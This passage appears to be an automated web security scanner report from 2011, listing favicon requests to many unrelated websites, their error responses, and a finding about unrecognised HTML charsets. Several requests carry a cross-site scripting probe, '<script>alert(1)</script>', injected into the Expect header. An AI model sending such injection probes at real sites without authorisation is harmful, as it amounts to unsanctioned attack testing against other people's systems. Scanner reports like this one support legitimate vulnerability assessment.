User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.sugarslam.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 11:18:13 GMT
Server: Apache/2.2
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 539

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

29.158. http://www.surnamesite.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.surnamesite.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.surnamesite.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 10:27:28 GMT
Server: Apache/1.3.20 (Unix) PHP/4.0.6
X-Powered-By: PHP/4.0.6
Content-Type: text/html
Content-Length: 132

<HEAD><TITLE>File Not found</TITLE></HEAD>
<BODY><H1>File Not found</H1>
The requested URL was not found on this server.<P>
</BODY>

29.159. http://www.surveysuperrewards.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.surveysuperrewards.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.surveysuperrewards.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 11:05:04 GMT
Server: UltraDNS Client Redirection Server
Last-Modified: Tue, 03 May 2011 11:05:04 GMT
Accept-Ranges: none
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN">
<html>
<head><title>UltraDNS Client Redirection Service</title></head>
<body><table border="2" width="100%">
<tr bgcolor="#FF4444"><th colspan="2"
...[SNIP]...

29.160. http://www.tatravelcenters.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.tatravelcenters.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.tatravelcenters.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
Date: Tue, 03 May 2011 10:28:49 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

29.161. http://www.teriskitchen.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.teriskitchen.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.teriskitchen.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

29.162. http://www.theoldschoolhousestore.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.theoldschoolhousestore.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.theoldschoolhousestore.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 10:48:41 GMT
Server: Apache
Last-Modified: Mon, 19 Oct 2009 13:23:30 GMT
ETag: "1d18081-3cc-47649a6cd3880"
Accept-Ranges: bytes
Content-Length: 972
Connection: close
Content-Type: text/html

<HTML>
<HEAD>
<TITLE>404 Not Found</TITLE>
</HEAD>
<BODY>
<H1>Not Found</H1>
The requested document was not found on this server.
<P>
<HR>
<ADDRESS>
Web Server at theoldschoolhousestore.com
</ADDRESS>
...[SNIP]...

29.163. http://www.timescommunity.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.timescommunity.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.timescommunity.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Tue, 03 May 2011 11:06:59 GMT
Content-Type: text/html
Content-Length: 162
Connection: keep-alive

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx</center>
</body>
</html>

29.164. http://www.toonshere.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.toonshere.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.toonshere.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.64
Date: Tue, 03 May 2011 10:27:11 GMT
Content-Type: text/html
Content-Length: 169
Connection: keep-alive

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/0.7.64</center>
</body>
</html>

29.165. http://www.toviaz.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.toviaz.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.toviaz.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Content-Length: 2510
Content-Type: text/html
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:49:45 GMT

...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<title>Toviaz fi
...[SNIP]...

29.166. http://www.tradearca.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.tradearca.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.tradearca.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

29.167. http://www.travisa.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.travisa.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.travisa.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:59:57 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

29.168. http://www.triadfinancial.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.triadfinancial.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.triadfinancial.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Content-Length: 134
Content-Type: text/html
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 11:08:30 GMT

<HTML>
<HEAD>

<meta http-equiv="Refresh" content="0;URL=http://www.santanderconsumerusa.com/default.aspx" />

</HEAD>
</HTML>

29.169. http://www.tubegoggles.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.tubegoggles.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.tubegoggles.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.64
Date: Tue, 03 May 2011 11:31:36 GMT
Content-Type: text/html
Content-Length: 169
Connection: keep-alive

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/0.7.64</center>
</body>
</html>

29.170. http://www.tubewifes.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.tubewifes.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.tubewifes.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.46
Date: Tue, 03 May 2011 10:59:35 GMT
Content-Type: text/html
Content-Length: 169
Connection: keep-alive

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/0.7.46</center>
</body>
</html>

29.171. http://www.tulalipcasino.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.tulalipcasino.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.tulalipcasino.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:37:58 GMT
Content-Length: 103

The resource you are looking for has been removed, had its name changed, or is temporarily unavailable.

29.172. http://www.uacareertrack.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.uacareertrack.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.uacareertrack.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 403 Forbidden
Content-Type: text/html
Server: Microsoft-IIS/7.5
Date: Tue, 03 May 2011 10:35:26 GMT
Content-Length: 278

<SCRIPT type=text/javascript>
<!--
if (location.protocol != 'https:')
{
window.location = 'https://'+ location.host + location.pathname + location.search;
//alert(location.host + location.pa
...[SNIP]...

29.173. http://www.unclaimed.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.unclaimed.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.unclaimed.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 10:20:52 GMT
Server: ConcentricHost-Ashurbanipal/2.0 (XO(R) Web Site Hosting)
Accept-Ranges: bytes
Content-Length: 149
Content-Type: text/html

<html><head><title>404 Not Found</title></head><body><h1>404 Not Found</h1>The requested URL /favicon.ico was not found on this server.</body></html>

29.174. http://www.upskirtcollection.net/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.upskirtcollection.net
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.upskirtcollection.net
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.54
Date: Tue, 03 May 2011 10:32:59 GMT
Content-Type: text/html
Content-Length: 169
Connection: keep-alive

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/0.8.54</center>
</body>
</html>

29.175. http://www.uscareerinstitute.edu/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.uscareerinstitute.edu
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.uscareerinstitute.edu
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:19:26 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

29.176. http://www.vampirediaries.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.vampirediaries.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.vampirediaries.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.54
Date: Tue, 03 May 2011 10:57:54 GMT
Content-Type: text/html
Content-Length: 169
Connection: keep-alive

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/0.8.54</center>
</body>
</html>

29.177. http://www.vindictuswiki.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.vindictuswiki.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.vindictuswiki.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 529
Date: Tue, 03 May 2011 10:23:05 GMT
Connection: keep-alive
X-Cache-Hits: 2
X-Cache-TTL: 291.330/129
X-Backend: phpservers2
X-Req: 1994524408 1994384919
X-Language: en
X-URL: /favicon.ico

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/0.7.65</center>
</body>
</html>
<!-- The padding to disable MSI
...[SNIP]...

29.178. http://www.vivalagames.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.vivalagames.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.vivalagames.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

29.179. http://www.voltairenet.org/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.voltairenet.org
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.voltairenet.org
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 10:18:43 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 06 Aug 2008 17:44:29 GMT
ETag: "45a45f-3c1-1fd0f940"
Accept-Ranges: bytes
Content-Length: 961
Connection: close
Content-Type: text/html

<HTML>
<HEAD>
<TITLE>404 Not Found</TITLE>
</HEAD>
<BODY>
<H1>Not Found</H1>
The requested document was not found on this server.
<P>
<HR>
<ADDRESS>
Web Server at voltairenet.org
</ADDRESS>
</BODY>
</
...[SNIP]...

29.180. http://www.wavy10.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wavy10.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.wavy10.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 11:19:22 GMT
Server: Apache/2.2.17 (Unix) FrontPage/5.0.2.2635
Last-Modified: Thu, 26 Jul 2007 15:14:04 GMT
ETag: "19b842-2b5-4362c13c0adc6"
Accept-Ranges: bytes
Content-Length: 693
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>404 Page Not Found</TITLE>
<style type="text/css">
<!--
h1 {
font-family:Verdana, Arial, Helvetica, sans-serif;
font-size: 24p
...[SNIP]...

29.181. http://www.wdasfm.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wdasfm.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.wdasfm.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

29.182. http://www.webfeedreader.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.webfeedreader.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.webfeedreader.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Object Not Found
Server: Microsoft-IIS/5.0
Date: Tue, 03 May 2011 10:18:29 GMT
Connection: close
Content-Type: text/html
Content-Length: 111

<html><head><title>Site Not Found</title></head>
<body>No web site is configured at this address.</body></html>

29.183. http://www.westathome.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.westathome.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.westathome.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Content-Length: 3162
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:51:35 GMT

<head>
<title>Home-based Agent Customer Care Solutions, Home Agent Results . West at Home</title>
<link rel="stylesheet" type="text/css" href="http://www.westathome.com/css/main.css" />
<link rel="
...[SNIP]...

29.184. http://www.wildmatures.org/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wildmatures.org
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.wildmatures.org
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.65
Date: Tue, 03 May 2011 10:57:54 GMT
Content-Type: text/html
Content-Length: 169
Connection: keep-alive

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/0.7.65</center>
</body>
</html>

29.185. http://www.willistonherald.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.willistonherald.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.willistonherald.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: WWW
Content-Type: text/html
Date: Tue, 03 May 2011 10:43:02 GMT
X-TN-ServedBy: cms.img.83
Force-Status: 1
Accept-Ranges: bytes
ETag: "1828397"
Last-Modified: Tue, 14 Oct 2008 18:45:00 GMT
Real-Hostname: willistonherald.com
Content-Length: 680
Connection: Keep-Alive
X-Cache-Info: cached

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Element not valid</title>
<style type="text/css">
body { background-color: white;
color: black;

...[SNIP]...

29.186. http://www.willyouhost.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.willyouhost.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.willyouhost.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.0 403 Forbidden
Cache-Control: no-cache
Connection: close
Content-Type: text/html

<html><body><h1>403 Forbidden</h1>
Request forbidden by administrative rules.
</body></html>

29.187. http://www.wrestlewithjimmy.net/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wrestlewithjimmy.net
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.wrestlewithjimmy.net
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.0 403 Forbidden
Cache-Control: no-cache
Connection: close
Content-Type: text/html

<html><body><h1>403 Forbidden</h1>
Request forbidden by administrative rules.
</body></html>

29.188. http://www.wtma.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wtma.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.wtma.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

29.189. http://www.wyyo.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wyyo.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.wyyo.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:29:33 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

29.190. http://www.xcomment.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xcomment.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.xcomment.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

29.191. http://www.xratedbodybuilders.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xratedbodybuilders.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.xratedbodybuilders.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx/0.6.34
Date: Tue, 03 May 2011 10:54:15 GMT
Content-Type: text/html
Content-Length: 169
Connection: keep-alive

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/0.6.34</center>
</body>
</html>

29.192. http://www.youngerbunnies.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.youngerbunnies.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.youngerbunnies.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.64
Date: Tue, 03 May 2011 10:58:05 GMT
Content-Type: text/html
Content-Length: 169
Connection: keep-alive

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/0.7.64</center>
</body>
</html>

29.193. http://www.zegeridotc.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.zegeridotc.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.zegeridotc.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

30. HTML uses unrecognised charset previous next
There are 8 instances of this issue:

http://www.aquascapeonline.com/favicon.ico
http://www.callsource.com/favicon.ico
http://www.hannspree.com/favicon.ico
http://www.jared-diamonds.com/favicon.ico
http://www.manga32.com/favicon.ico
http://www.mbn.com.ua/favicon.ico
http://www.qianlong.com/favicon.ico
http://www.save2pc.com/favicon.ico

Issue background

Applications may specify a non-standard character set as a result of typographical errors within the code base, or because of intentional usage of an unusual character set that is not universally recognised by browsers. If the browser does not recognise the character set specified by the application, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

30.1. http://www.aquascapeonline.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Tentative
Host:	http://www.aquascapeonline.com
Path:	/favicon.ico

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Request

Response

30.2. http://www.callsource.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Tentative
Host:	http://www.callsource.com
Path:	/favicon.ico

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directives were specified:

"utf-8"
utf-8

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.callsource.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 11:36:25 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.9
Set-Cookie: PHPSESSID=jov8oessu7vsrk0posue5llb97; path=/; HttpOnly
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-cache, max-age=0, must-revalidate
Pragma: no-cache
Set-Cookie: bypassStaticCache=deleted; expires=Mon, 03-May-2010 11:36:24 GMT; path=/; httponly
Set-Cookie: bypassStaticCache=deleted; expires=Mon, 03-May-2010 11:36:24 GMT; path=/; httponly
Connection: close
Content-Type: text/html; charset="utf-8"
Content-Length: 18527

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <base href="http://www.cal
...[SNIP]...
<meta name="generator" content="SilverStripe - http://silverstripe.org" />
<meta http-equiv="Content-type" content="text/html; charset=utf-8" />


   <link rel="stylesheet" type="text/css" href="/mysite/css/bhg_core.css" />
...[SNIP]...

30.3. http://www.hannspree.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Tentative
Host:	http://www.hannspree.com
Path:	/favicon.ico

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Big5

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.hannspree.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Content-Length: 1379
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:51:18 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>.......o......</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Big5">
<STYLE type="text/css">
...[SNIP]...

30.4. http://www.jared-diamonds.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Tentative
Host:	http://www.jared-diamonds.com
Path:	/favicon.ico

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

"iso-8859-1"

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.jared-diamonds.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset="iso-8859-1"
Content-Length: 108
Connection: Close

